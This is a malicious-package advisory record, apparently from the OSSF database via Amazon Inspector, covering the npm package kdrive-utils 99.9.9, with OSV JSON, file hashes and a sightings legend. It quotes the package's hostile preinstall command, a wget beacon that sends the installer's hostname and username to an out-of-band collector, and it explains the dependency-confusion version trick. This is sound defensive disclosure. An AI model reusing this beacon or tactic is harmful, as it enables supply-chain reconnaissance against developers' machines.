MAL-2026-6295
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943)
package.json declares a preinstall lifecycle script that auto-executes on npm install and runs wget -q -O- "http://d8svb0ao12pnoovdaih0giunhdew5oqa4.oast.live/$(hostname)/$(whoami)". The installer's hostname and current OS username are embedded directly into the request path and sent over plain HTTP to an oast.live (Interactsh / out-of-band application security testing) listener — an attacker-controlled DNS/HTTP collector commonly used for supply-chain reconnaissance and typosquat/dependency-confusion probes. The package is an unscoped name published at version 99.9.9, which is the canonical dependency-confusion shape (high version number to win resolution against an internal package of the same name). No legitimate functionality is shipped beyond the beacon.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "package.json",
"sha256": "3e083f1bb63f99ec23aa5406ef23b8d95565aa155a08a7f5fc5e1c96a71a2e29",
"tlsh": "09d05b298d62d93719c446765977a50ab5604d6e00987d1977431118407c77264ba64d"
}
],
"package_integrity": [
{
"filename": "kdrive-utils-99.9.9.tgz",
"hashes": {
"sha1": "415c520c5996bac1e61987623d5d77f1b01b6008",
"sha512_sri": "sha512-Dqvumed8dz0pGCUo0GixsrzVTgwqR5EkrmJQeJX+zsU5RdfonHXyBaaZtVJMuYxTw0JeyQZpeNGmErWbEUKs2A=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "kdrive-utils"
},
"versions": [
"99.9.9"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-007201",
"import_time": "2026-06-23T14:23:02.850265321Z",
"modified_time": "2026-06-23T14:10:49Z",
"sha256": "3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943",
"source": "amazon-inspector",
"versions": [
"99.9.9"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943)\npackage.json declares a preinstall lifecycle script that auto-executes on `npm install` and runs `wget -q -O- \"http://d8svb0ao12pnoovdaih0giunhdew5oqa4.oast.live/$(hostname)/$(whoami)\"`. The installer\u0027s hostname and current OS username are embedded directly into the request path and sent over plain HTTP to an oast.live (Interactsh / out-of-band application security testing) listener \u2014 an attacker-controlled DNS/HTTP collector commonly used for supply-chain reconnaissance and typosquat/dependency-confusion probes. The package is an unscoped name published at version 99.9.9, which is the canonical dependency-confusion shape (high version number to win resolution against an internal package of the same name). No legitimate functionality is shipped beyond the beacon.\n",
"id": "MAL-2026-6295",
"modified": "2026-06-23T14:10:49Z",
"published": "2026-06-23T14:10:49Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/kdrive-utils/v/99.9.9"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in kdrive-utils (npm)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.